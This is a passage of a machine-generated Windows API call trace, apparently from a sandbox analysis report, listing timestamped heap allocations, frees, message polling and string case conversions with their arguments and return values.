0x2a72648 [0218.838] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0218.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab908 [0218.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a747d8 [0218.838] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0218.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0218.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0218.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0218.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0218.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0218.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0218.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0218.839] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0218.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0218.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0218.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0218.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0218.839] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0218.839] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0218.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0218.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0218.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0218.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0218.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0218.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0218.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0218.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0218.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a747d8 | out: hHeap=0x2af0000) returned 1 [0218.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0218.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0218.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0218.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0218.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0218.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0218.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0218.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0218.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0218.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0218.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0218.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0218.840] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0218.840] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0218.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.840] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0218.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0218.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab980 [0218.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74748 [0218.841] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0218.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0218.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0218.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0218.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0218.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0218.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0218.841] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0218.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0218.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0218.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0218.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0218.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0218.841] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0218.841] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0218.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0218.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0218.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0218.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0218.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0218.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.842] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74748 | out: hHeap=0x2af0000) returned 1 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0218.842] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0218.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0218.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0218.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0218.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0218.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0218.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0218.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0218.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0218.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0218.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0218.843] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0218.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab788 [0218.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0218.843] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0218.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0218.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0218.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0218.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0218.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0218.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0218.844] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0218.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0218.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0218.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0218.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.844] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0218.844] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0218.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0218.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0218.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0218.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.846] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0218.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabce0 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: 